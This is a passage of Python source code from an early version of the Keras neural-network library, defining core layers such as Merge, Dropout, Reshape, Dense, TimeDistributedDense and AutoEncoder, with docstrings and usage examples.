    def get_output(self, train=False):
        inputs = self.get_input(train)
        # Zero out timesteps whose every feature equals mask_value.
        keep = K.any(K.not_equal(inputs, self.mask_value),
                     axis=-1, keepdims=True)
        return inputs * K.cast(keep, K.floatx())
    def get_config(self):
        base_config = super(Masking, self).get_config()
        config = {'name': self.__class__.__name__,
                  'mask_value': self.mask_value}
        return dict(list(base_config.items()) + list(config.items()))
class Merge(Layer):
    '''Merge the output of a list of layers or containers into a single tensor.
    # Arguments
        mode: one of {sum, mul, concat, ave, join, cos, dot}.
            sum: sum the outputs (shapes must match)
            mul: multiply the outputs element-wise (shapes must match)
            concat: concatenate the outputs along the axis specified by `concat_axis`
            ave: average the outputs (shapes must match)
            join: places the outputs in an OrderedDict (inputs must be named)
        concat_axis: axis to use in `concat` mode.
        dot_axes: axis or axes to use in `dot` mode
            (see [the Numpy documentation](http://docs.scipy.org/doc/numpy-1.10.1/reference/generated/numpy.tensordot.html) for more details).
    # TensorFlow warning
        `dot` mode only works with Theano for the time being.
    # Examples
    ```python
    left = Sequential()
    left.add(Dense(50, input_shape=(784,)))
    left.add(Activation('relu'))
    right = Sequential()
    right.add(Dense(50, input_shape=(784,)))
    right.add(Activation('relu'))
    model = Sequential()
    model.add(Merge([left, right], mode='sum'))
    model.add(Dense(10))
    model.add(Activation('softmax'))
    model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
    model.fit([X_train, X_train], Y_train, batch_size=128, nb_epoch=20,
              validation_data=([X_test, X_test], Y_test))
    ```
    '''
    def __init__(self, layers, mode='sum', concat_axis=-1, dot_axes=-1):
        if len(layers) < 2:
            raise Exception('Please specify two or more input layers '
                            '(or containers) to merge')
        if mode not in {'sum', 'mul', 'concat', 'ave', 'join', 'cos', 'dot'}:
            raise Exception('Invalid merge mode: ' + str(mode))
        # Element-wise modes require all branches to produce the same shape.
        if mode in {'sum', 'mul', 'ave', 'cos'}:
            input_shapes = set([l.output_shape for l in layers])
            if len(input_shapes) > 1:
                raise Exception('Only layers of same output shape can '
                                'be merged using ' + mode + ' mode. ' +
                                'Layer shapes: %s' % ([l.output_shape for l in layers]))
        # 'cos' and 'dot' are implemented with Theano's batched_tensordot
        # and only accept exactly two branches.
        if mode in {'cos', 'dot'}:
            if K._BACKEND != 'theano':
                raise Exception('"' + mode + '" merge mode will only work with Theano.')
            if len(layers) > 2:
                raise Exception(mode + ' merge takes exactly 2 layers')
            shape1 = layers[0].output_shape
            shape2 = layers[1].output_shape
            n1 = len(shape1)
            n2 = len(shape2)
            if mode == 'dot':
                # Normalize an integer dot_axes into the canonical
                # [axes-of-layer1, axes-of-layer2] list-of-ranges form,
                # then validate that the paired dimensions agree.
                if type(dot_axes) == int:
                    if dot_axes < 0:
                        dot_axes = [range(dot_axes % n1, n1), range(dot_axes % n2, n2)]
                    else:
                        dot_axes = [range(n1 - dot_axes, n2), range(1, dot_axes + 1)]
                if type(dot_axes) not in [list, tuple]:
                    raise Exception('Invalid type for dot_axes - should be a list.')
                if len(dot_axes) != 2:
                    raise Exception('Invalid format for dot_axes - should contain two elements.')
                if type(dot_axes[0]) not in [list, tuple, range] or type(dot_axes[1]) not in [list, tuple, range]:
                    raise Exception('Invalid format for dot_axes - list elements should have type "list" or "tuple".')
                for i in range(len(dot_axes[0])):
                    if shape1[dot_axes[0][i]] != shape2[dot_axes[1][i]]:
                        raise Exception('Dimension incompatibility using dot mode: ' +
                                        '%s != %s. ' % (shape1[dot_axes[0][i]], shape2[dot_axes[1][i]]) +
                                        'Layer shapes: %s, %s' % (shape1, shape2))
        elif mode == 'concat':
            # All branch shapes must agree on every axis except concat_axis.
            input_shapes = set()
            for l in layers:
                oshape = list(l.output_shape)
                oshape.pop(concat_axis)
                oshape = tuple(oshape)
                input_shapes.add(oshape)
            if len(input_shapes) > 1:
                raise Exception('"concat" mode can only merge layers with matching ' +
                                'output shapes except for the concat axis. ' +
                                'Layer shapes: %s' % ([l.output_shape for l in layers]))
        self.mode = mode
        self.concat_axis = concat_axis
        self.dot_axes = dot_axes
        self.layers = layers
        # Gather the weights/regularizers/constraints/updates of every
        # merged branch so this Merge behaves as a single layer.
        self.trainable_weights = []
        self.regularizers = []
        self.constraints = []
        self.updates = []
        for l in self.layers:
            params, regs, consts, updates = l.get_params()
            self.regularizers += regs
            self.updates += updates
            # params and constraints have the same size
            for p, c in zip(params, consts):
                if p not in self.trainable_weights:
                    self.trainable_weights.append(p)
                    self.constraints.append(c)
        super(Merge, self).__init__()
    @property
    def output_shape(self):
        # Shape inference depends on the merge mode.
        input_shapes = [layer.output_shape for layer in self.layers]
        if self.mode in ['sum', 'mul', 'ave']:
            return input_shapes[0]
        elif self.mode == 'concat':
            output_shape = list(input_shapes[0])
            for shape in input_shapes[1:]:
                output_shape[self.concat_axis] += shape[self.concat_axis]
            return tuple(output_shape)
        elif self.mode == 'join':
            return None
        elif self.mode == 'dot':
            # Infer the tensordot result shape by performing a dummy
            # numpy tensordot on zero arrays of the per-sample shapes.
            shape1 = list(input_shapes[0])
            shape2 = list(input_shapes[1])
            dot_axes = []
            for axes in self.dot_axes:
                dot_axes.append([index-1 for index in axes])
            tensordot_output = np.tensordot(np.zeros(tuple(shape1[1:])),
                                            np.zeros(tuple(shape2[1:])),
                                            axes=dot_axes)
            if len(tensordot_output.shape) == 0:
                shape = (1,)
            else:
                shape = tensordot_output.shape
            return (shape1[0],) + shape
        elif self.mode == 'cos':
            return (input_shapes[0][0], 1)
    def get_params(self):
        return self.trainable_weights, self.regularizers, self.constraints, self.updates
    def get_output(self, train=False):
        '''Compute the merged output tensor according to `self.mode`.'''
        if self.mode == 'sum' or self.mode == 'ave':
            s = self.layers[0].get_output(train)
            for i in range(1, len(self.layers)):
                s += self.layers[i].get_output(train)
            if self.mode == 'ave':
                s /= len(self.layers)
            return s
        elif self.mode == 'concat':
            inputs = [self.layers[i].get_output(train) for i in range(len(self.layers))]
            return K.concatenate(inputs, axis=self.concat_axis)
        elif self.mode == 'join':
            # 'join' does not produce a tensor; it returns an OrderedDict
            # keyed by each branch's layer name.
            inputs = OrderedDict()
            for i in range(len(self.layers)):
                X = self.layers[i].get_output(train)
                name = getattr(self.layers[i], 'name', None)
                if name is None:
                    raise ValueError('merge_mode="join" only works with named inputs.')
                else:
                    inputs[name] = X
            return inputs
        elif self.mode == 'mul':
            s = self.layers[0].get_output(train)
            for i in range(1, len(self.layers)):
                s *= self.layers[i].get_output(train)
            return s
        elif self.mode == 'dot':
            if K._BACKEND != 'theano':
                raise Exception('"dot" merge mode will only work with Theano.')
            from theano import tensor as T
            l1 = self.layers[0].get_output(train)
            l2 = self.layers[1].get_output(train)
            output = T.batched_tensordot(l1, l2, self.dot_axes)
            output_shape = list(self.output_shape)
            output_shape[0] = l1.shape[0]
            output = output.reshape(tuple(output_shape))
            return output
        elif self.mode == 'cos':
            if K._BACKEND != 'theano':
                raise Exception('"cos" merge mode will only work with Theano.')
            from theano import tensor as T
            l1 = self.layers[0].get_output(train)
            l2 = self.layers[1].get_output(train)
            # Cosine similarity: normalized batched tensordot.
            output = T.batched_tensordot(l1, l2, self.dot_axes) / T.sqrt(T.batched_tensordot(l1, l1, self.dot_axes) * T.batched_tensordot(l2, l2, self.dot_axes))
            output = output.dimshuffle((0, 'x'))
            return output
        else:
            raise Exception('Unknown merge mode.')
    def get_input(self, train=False):
        # Collect the (deduplicated) input tensors of all merged branches.
        res = []
        for i in range(len(self.layers)):
            o = self.layers[i].get_input(train)
            if not type(o) == list:
                o = [o]
            for output in o:
                if output not in res:
                    res.append(output)
        return res
    @property
    def input(self):
        return self.get_input()
    def supports_masked_input(self):
        return False
    def get_output_mask(self, train=None):
        return None
    def get_weights(self):
        # Concatenate the weights of every branch, in branch order.
        weights = []
        for l in self.layers:
            weights += l.get_weights()
        return weights
    def set_weights(self, weights):
        # Distribute the flat weight list across the branches, consuming
        # each branch's parameter count in turn.
        for i in range(len(self.layers)):
            nb_param = len(self.layers[i].trainable_weights)
            self.layers[i].set_weights(weights[:nb_param])
            weights = weights[nb_param:]
    def get_config(self):
        config = {'name': self.__class__.__name__,
                  'layers': [l.get_config() for l in self.layers],
                  'mode': self.mode,
                  'concat_axis': self.concat_axis,
                  'dot_axes': self.dot_axes}
        base_config = super(Merge, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
class TimeDistributedMerge(Layer):
    '''Sum/multiply/average over the outputs of a TimeDistributed layer.
    # Input shape
        3D tensor with shape: `(samples, steps, features)`.
    # Output shape
        2D tensor with shape: `(samples, features)`.
    # Arguments
        mode: one of {'sum', 'mul', 'ave'}
    '''
    input_ndim = 3
    def __init__(self, mode='sum', **kwargs):
        super(TimeDistributedMerge, self).__init__(**kwargs)
        self.mode = mode
        # This layer has no parameters of its own.
        self.trainable_weights = []
        self.regularizers = []
        self.constraints = []
        self.updates = []
    @property
    def output_shape(self):
        # Fix: propagate the (possibly known) batch dimension instead of
        # always discarding it as None, so downstream shape inference
        # keeps a concrete batch size when one was specified.
        input_shape = self.input_shape
        return (input_shape[0], input_shape[2])
    def get_output(self, train=False):
        '''Reduce the input over the time axis (axis 1) with `self.mode`.'''
        X = self.get_input(train)
        # Normalized to a single if/elif chain (the original mixed a
        # stand-alone `if` into the chain, which obscured the dispatch).
        if self.mode == 'ave':
            return K.mean(X, axis=1)
        elif self.mode == 'sum':
            return K.sum(X, axis=1)
        elif self.mode == 'mul':
            return K.prod(X, axis=1)
        else:
            raise Exception('Unknown merge mode')
    def get_config(self):
        config = {'name': self.__class__.__name__,
                  'mode': self.mode}
        base_config = super(TimeDistributedMerge, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
class Dropout(MaskedLayer):
    '''Apply Dropout to the input: during training, randomly zero a
    fraction `p` of the input units at each update, which helps
    prevent overfitting.
    # Arguments
        p: float between 0 and 1. Fraction of the input units to drop.
    # References
        - [Dropout: A Simple Way to Prevent Neural Networks from Overfitting](http://www.cs.toronto.edu/~rsalakhu/papers/srivastava14a.pdf)
    '''
    def __init__(self, p, **kwargs):
        super(Dropout, self).__init__(**kwargs)
        self.p = p
    def get_output(self, train=False):
        inputs = self.get_input(train)
        # Dropout only acts at training time and only when p > 0;
        # otherwise the input passes through unchanged.
        if train and self.p > 0.:
            inputs = K.dropout(inputs, level=self.p)
        return inputs
    def get_config(self):
        base_config = super(Dropout, self).get_config()
        config = {'name': self.__class__.__name__,
                  'p': self.p}
        return dict(list(base_config.items()) + list(config.items()))
class Activation(MaskedLayer):
    '''Apply an element-wise activation function to the input.
    # Input shape
        Arbitrary. Use the keyword argument `input_shape`
        (tuple of integers, does not include the samples axis)
        when using this layer as the first layer in a model.
    # Output shape
        Same shape as input.
    # Arguments:
        activation: name of activation function to use
            (see: [activations](../activations.md)),
            or alternatively, a Theano or TensorFlow operation.
    '''
    def __init__(self, activation, **kwargs):
        super(Activation, self).__init__(**kwargs)
        # Resolve a name (e.g. 'relu') or a callable to the function.
        self.activation = activations.get(activation)
    def get_output(self, train=False):
        return self.activation(self.get_input(train))
    def get_config(self):
        base_config = super(Activation, self).get_config()
        config = {'name': self.__class__.__name__,
                  'activation': self.activation.__name__}
        return dict(list(base_config.items()) + list(config.items()))
class Reshape(Layer):
    '''Reshape an output to a certain shape.
    # Input shape
        Arbitrary, although all dimensions in the input shaped must be fixed.
        Use the keyword argument `input_shape`
        (tuple of integers, does not include the samples axis)
        when using this layer as the first layer in a model.
    # Output shape
        `(batch_size,) + dims`
    # Arguments
        dims: target shape. Tuple of integers,
        does not include the samples dimension (batch size).
        A single -1 entry is allowed and is inferred from the input size.
    '''
    def __init__(self, dims, **kwargs):
        super(Reshape, self).__init__(**kwargs)
        self.dims = tuple(dims)
    def _fix_unknown_dimension(self, input_shape, output_shape):
        '''Find and replace a single missing dimension in an output shape
        given and input shape.
        A near direct port of the internal numpy function _fix_unknown_dimension
        in numpy/core/src/multiarray/shape.c
        # Arguments
            input_shape: shape of array being reshaped
            output_shape: desired shaped of the array with at most
                a single -1 which indicates a dimension that should be
                derived from the input shape.
        # Returns
            The new output shape with a -1 replaced with its computed value.
            Raises a ValueError if the total array size of the output_shape is
            different then the input_shape, or more then one unknown dimension
            is specified.
        '''
        output_shape = list(output_shape)
        msg = 'total size of new array must be unchanged'
        # known: product of all explicitly given dims; unknown: index of
        # the single -1 entry (if any).
        known, unknown = 1, None
        for index, dim in enumerate(output_shape):
            if dim < 0:
                if unknown is None:
                    unknown = index
                else:
                    raise ValueError('can only specify one unknown dimension')
            else:
                known *= dim
        original = np.prod(input_shape, dtype=int)
        if unknown is not None:
            # The inferred dim must divide the input size evenly.
            if known == 0 or original % known != 0:
                raise ValueError(msg)
            output_shape[unknown] = original // known
        elif original != known:
            raise ValueError(msg)
        return tuple(output_shape)
    @property
    def output_shape(self):
        # Batch dimension is preserved; -1 in dims is resolved here.
        return (self.input_shape[0],) + self._fix_unknown_dimension(self.input_shape[1:], self.dims)
    def get_output(self, train=False):
        X = self.get_input(train)
        # -1 lets the backend infer the batch size at run time.
        return K.reshape(X, (-1,) + self.output_shape[1:])
    def get_config(self):
        config = {'name': self.__class__.__name__,
                  'dims': self.dims}
        base_config = super(Reshape, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
class Permute(Layer):
    '''Permute the dimensions of the input according to a given pattern.
    Useful for e.g. connecting RNNs and convnets together.
    # Input shape
        Arbitrary. Use the keyword argument `input_shape`
        (tuple of integers, does not include the samples axis)
        when using this layer as the first layer in a model.
    # Output shape
        Same as the input shape, but with the dimensions re-ordered according
        to the specified pattern.
    # Arguments
        dims: Tuple of integers. Permutation pattern, does not include the
            samples dimension. Indexing starts at 1.
            For instance, `(2, 1)` permutes the first and second dimension
            of the input.
    '''
    def __init__(self, dims, **kwargs):
        super(Permute, self).__init__(**kwargs)
        self.dims = tuple(dims)
    @property
    def output_shape(self):
        # dims are 1-indexed over the non-batch axes; the batch axis
        # (index 0) always stays in place.
        in_shape = list(self.input_shape)
        out_shape = list(in_shape)
        for pos, source_axis in enumerate(self.dims, start=1):
            out_shape[pos] = in_shape[source_axis]
        return tuple(out_shape)
    def get_output(self, train=False):
        inputs = self.get_input(train)
        # Prepend axis 0 so the batch dimension is never permuted.
        return K.permute_dimensions(inputs, (0,) + self.dims)
    def get_config(self):
        base_config = super(Permute, self).get_config()
        config = {'name': self.__class__.__name__,
                  'dims': self.dims}
        return dict(list(base_config.items()) + list(config.items()))
class Flatten(Layer):
    '''Flatten the input to 2D `(batch_size, prod(other dims))`.
    Does not affect the batch size.
    # Input shape
        Arbitrary, although all dimensions in the input shape must be fixed.
        Use the keyword argument `input_shape`
        (tuple of integers, does not include the samples axis)
        when using this layer as the first layer in a model.
    '''
    def __init__(self, **kwargs):
        super(Flatten, self).__init__(**kwargs)
    @property
    def output_shape(self):
        shape = self.input_shape
        # Every non-batch dimension must be known to compute the flat size.
        if not all(shape[1:]):
            raise Exception('The shape of the input to "Flatten" '
                            'is not fully defined '
                            '(got ' + str(shape[1:]) + '. '
                            'Make sure to pass a complete "input_shape" '
                            'or "batch_input_shape" argument to the first '
                            'layer in your model.')
        return (shape[0], np.prod(shape[1:]))
    def get_output(self, train=False):
        return K.batch_flatten(self.get_input(train))
class RepeatVector(Layer):
    '''Repeat the input vector n times along a new time axis.
    # Input shape
        2D tensor of shape `(nb_samples, features)`.
    # Output shape
        3D tensor of shape `(nb_samples, n, features)`.
    # Arguments
        n: integer, repetition factor.
    '''
    def __init__(self, n, **kwargs):
        super(RepeatVector, self).__init__(**kwargs)
        self.n = n
    @property
    def output_shape(self):
        shape = self.input_shape
        # A new axis of length n is inserted between batch and features.
        return (shape[0], self.n, shape[1])
    def get_output(self, train=False):
        return K.repeat(self.get_input(train), self.n)
    def get_config(self):
        base_config = super(RepeatVector, self).get_config()
        config = {'name': self.__class__.__name__,
                  'n': self.n}
        return dict(list(base_config.items()) + list(config.items()))
class Dense(Layer):
    '''Just your regular fully connected NN layer.
    # Input shape
        2D tensor with shape: `(nb_samples, input_dim)`.
    # Output shape
        2D tensor with shape: `(nb_samples, output_dim)`.
    # Arguments
        output_dim: int > 0.
        init: name of initialization function for the weights of the layer
            (see [initializations](../initializations.md)),
            or alternatively, Theano function to use for weights
            initialization. This parameter is only relevant
            if you don't pass a `weights` argument.
        activation: name of activation function to use
            (see [activations](../activations.md)),
            or alternatively, elementwise Theano function.
            If you don't specify anything, no activation is applied
            (ie. "linear" activation: a(x) = x).
        weights: list of numpy arrays to set as initial weights.
            The list should have 1 element, of shape `(input_dim, output_dim)`.
        W_regularizer: instance of [WeightRegularizer](../regularizers.md)
            (eg. L1 or L2 regularization), applied to the main weights matrix.
        b_regularizer: instance of [WeightRegularizer](../regularizers.md),
            applied to the bias.
        activity_regularizer: instance of [ActivityRegularizer](../regularizers.md),
            applied to the network output.
        W_constraint: instance of the [constraints](../constraints.md) module
            (eg. maxnorm, nonneg), applied to the main weights matrix.
        b_constraint: instance of the [constraints](../constraints.md) module,
            applied to the bias.
        input_dim: dimensionality of the input (integer).
            This argument (or alternatively, the keyword argument `input_shape`)
            is required when using this layer as the first layer in a model.
    '''
    input_ndim = 2
    def __init__(self, output_dim, init='glorot_uniform', activation='linear', weights=None,
                 W_regularizer=None, b_regularizer=None, activity_regularizer=None,
                 W_constraint=None, b_constraint=None, input_dim=None, **kwargs):
        # Resolve string identifiers to the actual init/activation callables.
        self.init = initializations.get(init)
        self.activation = activations.get(activation)
        self.output_dim = output_dim
        self.W_regularizer = regularizers.get(W_regularizer)
        self.b_regularizer = regularizers.get(b_regularizer)
        self.activity_regularizer = regularizers.get(activity_regularizer)
        self.W_constraint = constraints.get(W_constraint)
        self.b_constraint = constraints.get(b_constraint)
        # Constraints are positional: [W constraint, b constraint].
        self.constraints = [self.W_constraint, self.b_constraint]
        # Stored until build() runs, then applied and discarded.
        self.initial_weights = weights
        self.input_dim = input_dim
        if self.input_dim:
            kwargs['input_shape'] = (self.input_dim,)
        self.input = K.placeholder(ndim=2)
        super(Dense, self).__init__(**kwargs)
    def build(self):
        # Create W with shape (input_dim, output_dim) via the chosen
        # initializer, and a zero-initialized bias b of shape (output_dim,).
        input_dim = self.input_shape[1]
        self.W = self.init((input_dim, self.output_dim))
        self.b = K.zeros((self.output_dim,))
        self.trainable_weights = [self.W, self.b]
        self.regularizers = []
        if self.W_regularizer:
            self.W_regularizer.set_param(self.W)
            self.regularizers.append(self.W_regularizer)
        if self.b_regularizer:
            self.b_regularizer.set_param(self.b)
            self.regularizers.append(self.b_regularizer)
        if self.activity_regularizer:
            self.activity_regularizer.set_layer(self)
            self.regularizers.append(self.activity_regularizer)
        if self.initial_weights is not None:
            self.set_weights(self.initial_weights)
            del self.initial_weights
    @property
    def output_shape(self):
        return (self.input_shape[0], self.output_dim)
    def get_output(self, train=False):
        # y = activation(X . W + b)
        X = self.get_input(train)
        output = self.activation(K.dot(X, self.W) + self.b)
        return output
    def get_config(self):
        config = {'name': self.__class__.__name__,
                  'output_dim': self.output_dim,
                  'init': self.init.__name__,
                  'activation': self.activation.__name__,
                  'W_regularizer': self.W_regularizer.get_config() if self.W_regularizer else None,
                  'b_regularizer': self.b_regularizer.get_config() if self.b_regularizer else None,
                  'activity_regularizer': self.activity_regularizer.get_config() if self.activity_regularizer else None,
                  'W_constraint': self.W_constraint.get_config() if self.W_constraint else None,
                  'b_constraint': self.b_constraint.get_config() if self.b_constraint else None,
                  'input_dim': self.input_dim}
        base_config = super(Dense, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
class TimeDistributedDense(MaskedLayer):
    '''Apply the same Dense (fully connected) layer to every timestep
    (dimension 1) of a 3D input.
    Especially useful after a recurrent network with `return_sequences=True`.
    # Input shape
        3D tensor with shape `(nb_sample, time_dimension, input_dim)`.
    # Output shape
        3D tensor with shape `(nb_sample, time_dimension, output_dim)`.
    # Arguments
        output_dim: int > 0.
        init: name of initialization function for the weights of the layer
            (see [initializations](../initializations.md)),
            or alternatively, Theano function to use for weights
            initialization. This parameter is only relevant
            if you don't pass a `weights` argument.
        activation: name of activation function to use
            (see [activations](../activations.md)),
            or alternatively, elementwise Theano function.
            If you don't specify anything, no activation is applied
            (ie. "linear" activation: a(x) = x).
        weights: list of numpy arrays to set as initial weights.
            The list should have 1 element, of shape `(input_dim, output_dim)`.
        W_regularizer: instance of [WeightRegularizer](../regularizers.md)
            (eg. L1 or L2 regularization), applied to the main weights matrix.
        b_regularizer: instance of [WeightRegularizer](../regularizers.md),
            applied to the bias.
        activity_regularizer: instance of [ActivityRegularizer](../regularizers.md),
            applied to the network output.
        W_constraint: instance of the [constraints](../constraints.md) module
            (eg. maxnorm, nonneg), applied to the main weights matrix.
        b_constraint: instance of the [constraints](../constraints.md) module,
            applied to the bias.
        input_dim: dimensionality of the input (integer).
            This argument (or alternatively, the keyword argument `input_shape`)
            is required when using this layer as the first layer in a model.
        input_length: length of the time dimension (integer); combined with
            `input_dim` to form `input_shape` when this is the first layer.
    '''
    input_ndim = 3
    def __init__(self, output_dim,
                 init='glorot_uniform', activation='linear', weights=None,
                 W_regularizer=None, b_regularizer=None, activity_regularizer=None,
                 W_constraint=None, b_constraint=None,
                 input_dim=None, input_length=None, **kwargs):
        self.output_dim = output_dim
        # Resolve string identifiers into the actual functions/objects.
        self.init = initializations.get(init)
        self.activation = activations.get(activation)
        self.W_regularizer = regularizers.get(W_regularizer)
        self.b_regularizer = regularizers.get(b_regularizer)
        self.activity_regularizer = regularizers.get(activity_regularizer)
        self.W_constraint = constraints.get(W_constraint)
        self.b_constraint = constraints.get(b_constraint)
        # Order matches trainable_weights built in build(): [W, b].
        self.constraints = [self.W_constraint, self.b_constraint]
        self.initial_weights = weights
        self.input_dim = input_dim
        self.input_length = input_length
        if self.input_dim:
            # Let this layer act as the first layer of a model.
            kwargs['input_shape'] = (self.input_length, self.input_dim)
        self.input = K.placeholder(ndim=3)
        super(TimeDistributedDense, self).__init__(**kwargs)
    def build(self):
        # Feature size is the last axis of the (batch, time, features) input.
        input_dim = self.input_shape[2]
        self.W = self.init((input_dim, self.output_dim))
        self.b = K.zeros((self.output_dim,))
        self.trainable_weights = [self.W, self.b]
        self.regularizers = []
        if self.W_regularizer:
            self.W_regularizer.set_param(self.W)
            self.regularizers.append(self.W_regularizer)
        if self.b_regularizer:
            self.b_regularizer.set_param(self.b)
            self.regularizers.append(self.b_regularizer)
        if self.activity_regularizer:
            self.activity_regularizer.set_layer(self)
            self.regularizers.append(self.activity_regularizer)
        if self.initial_weights is not None:
            self.set_weights(self.initial_weights)
            del self.initial_weights
    @property
    def output_shape(self):
        input_shape = self.input_shape
        # Only the last (feature) axis changes size.
        return (input_shape[0], input_shape[1], self.output_dim)
    def get_output(self, train=False):
        X = self.get_input(train)
        def step(x, states):
            # Same affine transform applied at every timestep; no state carried.
            output = K.dot(x, self.W) + self.b
            return output, []
        # Reuse the backend RNN loop to map `step` over the time axis.
        last_output, outputs, states = K.rnn(step, X,
                                             initial_states=[],
                                             mask=None)
        # Activation applied to the whole output sequence at once.
        outputs = self.activation(outputs)
        return outputs
    def get_config(self):
        config = {'name': self.__class__.__name__,
                  'output_dim': self.output_dim,
                  'init': self.init.__name__,
                  'activation': self.activation.__name__,
                  'W_regularizer': self.W_regularizer.get_config() if self.W_regularizer else None,
                  'b_regularizer': self.b_regularizer.get_config() if self.b_regularizer else None,
                  'activity_regularizer': self.activity_regularizer.get_config() if self.activity_regularizer else None,
                  'W_constraint': self.W_constraint.get_config() if self.W_constraint else None,
                  'b_constraint': self.b_constraint.get_config() if self.b_constraint else None,
                  'input_dim': self.input_dim,
                  'input_length': self.input_length}
        base_config = super(TimeDistributedDense, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
class ActivityRegularization(Layer):
    '''Identity layer that passes its input through unchanged while adding
    an activity-based penalty to the cost function.
    # Input shape
        Arbitrary. Use the keyword argument `input_shape`
        (tuple of integers, does not include the samples axis)
        when using this layer as the first layer in a model.
    # Output shape
        Same shape as input.
    # Arguments
        l1: L1 regularization factor.
        l2: L2 regularization factor.
    '''
    def __init__(self, l1=0., l2=0., **kwargs):
        super(ActivityRegularization, self).__init__(**kwargs)
        self.l1 = l1
        self.l2 = l2
        # Attach an activity regularizer bound to this layer; the training
        # machinery picks it up from self.regularizers.
        regularizer = ActivityRegularizer(l1=l1, l2=l2)
        regularizer.set_layer(self)
        self.regularizers = [regularizer]
    def get_output(self, train=False):
        # Pure pass-through: the output is exactly the input.
        return self.get_input(train)
    def get_config(self):
        merged = dict(super(ActivityRegularization, self).get_config())
        merged.update({'name': self.__class__.__name__,
                       'l1': self.l1,
                       'l2': self.l2})
        return merged
class AutoEncoder(Layer):
    '''A customizable autoencoder model.
    # Input shape
        Same as encoder input.
    # Output shape
        If `output_reconstruction = True` then dim(input) = dim(output)
        else dim(output) = dim(hidden).
    # Arguments
        encoder: A [layer](./) or [layer container](./containers.md).
        decoder: A [layer](./) or [layer container](./containers.md).
        output_reconstruction: If this is `False`,
            the output of the autoencoder is the output of
            the deepest hidden layer.
            Otherwise, the output of the final decoder layer is returned.
        weights: list of numpy arrays to set as initial weights.
    # Examples
    ```python
    from keras.layers import containers, AutoEncoder, Dense
    from keras import models
    # input shape: (nb_samples, 32)
    encoder = containers.Sequential([Dense(16, input_dim=32), Dense(8)])
    decoder = containers.Sequential([Dense(16, input_dim=8), Dense(32)])
    autoencoder = AutoEncoder(encoder=encoder, decoder=decoder, output_reconstruction=True)
    model = models.Sequential()
    model.add(autoencoder)
    # training the autoencoder:
    model.compile(optimizer='sgd', loss='mse')
    model.fit(X_train, X_train, nb_epoch=10)
    # predicting compressed representations of inputs:
    autoencoder.output_reconstruction = False  # the model has to be recompiled after modifying this property
    model.compile(optimizer='sgd', loss='mse')
    representations = model.predict(X_test)
    ```
    '''
    def __init__(self, encoder, decoder, output_reconstruction=True,
                 weights=None, **kwargs):
        # Bug fix: the base __init__ was previously invoked twice (once here
        # and once again just before build()); a single call is sufficient.
        super(AutoEncoder, self).__init__(**kwargs)
        self._output_reconstruction = output_reconstruction
        self.encoder = encoder
        self.decoder = decoder
        if output_reconstruction:
            # Chain the decoder after the encoder so the full pipeline
            # reconstructs the input.
            self.decoder.set_previous(self.encoder)
        if weights is not None:
            self.set_weights(weights)
        self.build()
    @property
    def output_reconstruction(self):
        return self._output_reconstruction
    @output_reconstruction.setter
    def output_reconstruction(self, value):
        # Changing the flag alters which layers contribute parameters,
        # so the parameter lists must be rebuilt (and the model recompiled).
        self._output_reconstruction = value
        self.build()
    def build(self):
        '''Collect parameters/regularizers/constraints/updates from the
        layers that participate in the current output mode.'''
        self.trainable_weights = []
        self.regularizers = []
        self.constraints = []
        self.updates = []
        if self.output_reconstruction:
            layers = [self.encoder, self.decoder]
        else:
            layers = [self.encoder]
        for layer in layers:
            params, regularizers, constraints, updates = layer.get_params()
            self.regularizers += regularizers
            self.updates += updates
            # params and constraints are parallel lists
            for p, c in zip(params, constraints):
                if p not in self.trainable_weights:
                    self.trainable_weights.append(p)
                    self.constraints.append(c)
    def set_previous(self, node, reset_weights=True):
        # The encoder is the entry point of the autoencoder.
        self.encoder.set_previous(node, reset_weights)
        if reset_weights:
            self.build()
    def get_weights(self):
        '''Flat list of encoder weights followed by decoder weights.'''
        weights = []
        for layer in [self.encoder, self.decoder]:
            weights += layer.get_weights()
        return weights
    def set_weights(self, weights):
        '''Split a flat weight list between encoder and decoder.'''
        nb_param = len(self.encoder.trainable_weights)
        self.encoder.set_weights(weights[:nb_param])
        self.decoder.set_weights(weights[nb_param:])
    def get_input(self, train=False):
        return self.encoder.get_input(train)
    @property
    def input(self):
        return self.encoder.input
    @property
    def input_shape(self):
        return self.encoder.input_shape
    @property
    def output_shape(self):
        if self.output_reconstruction:
            return self.decoder.output_shape
        else:
            return self.encoder.output_shape
    def get_output(self, train=False):
        if self.output_reconstruction:
            return self.decoder.get_output(train)
        else:
            return self.encoder.get_output(train)
    def get_config(self):
        return {'name': self.__class__.__name__,
                'encoder_config': self.encoder.get_config(),
                'decoder_config': self.decoder.get_config(),
                'output_reconstruction': self.output_reconstruction}
class MaxoutDense(Layer):
    '''A dense maxout layer.
    A `MaxoutDense` layer takes the element-wise maximum of
    `nb_feature` `Dense(input_dim, output_dim)` linear layers.
    This allows the layer to learn a convex,
    piecewise linear activation function over the inputs.
    Note that this is a *linear* layer;
    if you wish to apply activation function
    (you shouldn't need to --they are universal function approximators),
    an `Activation` layer must be added after.
    # Input shape
        2D tensor with shape: `(nb_samples, input_dim)`.
    # Output shape
        2D tensor with shape: `(nb_samples, output_dim)`.
    # References
        - [Maxout Networks](http://arxiv.org/pdf/1302.4389.pdf)
    '''
    input_ndim = 2
    def __init__(self, output_dim, nb_feature=4,
                 init='glorot_uniform', weights=None,
                 W_regularizer=None, b_regularizer=None, activity_regularizer=None,
                 W_constraint=None, b_constraint=None, input_dim=None, **kwargs):
        self.output_dim = output_dim
        # Number of parallel linear pieces to take the max over.
        self.nb_feature = nb_feature
        self.init = initializations.get(init)
        self.W_regularizer = regularizers.get(W_regularizer)
        self.b_regularizer = regularizers.get(b_regularizer)
        self.activity_regularizer = regularizers.get(activity_regularizer)
        self.W_constraint = constraints.get(W_constraint)
        self.b_constraint = constraints.get(b_constraint)
        # Order matches trainable_weights built in build(): [W, b].
        self.constraints = [self.W_constraint, self.b_constraint]
        self.initial_weights = weights
        self.input_dim = input_dim
        if self.input_dim:
            kwargs['input_shape'] = (self.input_dim,)
        self.input = K.placeholder(ndim=2)
        super(MaxoutDense, self).__init__(**kwargs)
    def build(self):
        input_dim = self.input_shape[1]
        # One (input_dim, output_dim) weight matrix and bias per feature.
        self.W = self.init((self.nb_feature, input_dim, self.output_dim))
